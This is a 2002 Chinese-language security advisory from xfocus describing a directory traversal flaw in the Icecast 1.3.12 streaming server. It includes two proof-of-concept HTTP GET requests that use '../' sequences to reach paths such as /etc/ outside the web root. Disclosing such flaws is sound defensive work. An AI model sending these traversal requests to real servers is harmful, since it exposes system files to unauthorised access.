xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Icecast Server目录遍历信息泄露漏洞


发布时间:2002-07-15
更新时间:2002-07-15
严重程度:
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式

BUGTRAQ ID:5189

受影响系统
Icecast Icecast 1.3.12
   + Caldera OpenLinux Server 3.1
   + Caldera OpenLinux Server 3.1.1
详细描述
Icecast是免费开放源代码音乐流服务程序,使用在多种系统平台下。

由于Icecast服务程序对用户提交的请求缺少过滤,攻击者可以进行目录遍历攻击。

测试代码
GET /file/../../../../../../../../nonexistent/ HTTP/1.0

GET /file/../../../../../../../../etc/ HTTP/1.0

解决方案
尚无

相关信息
glaive@VANED.NET.
参考:http://online.securityfocus.com/archive/82/281274
相关主页:http://www.icecast.org/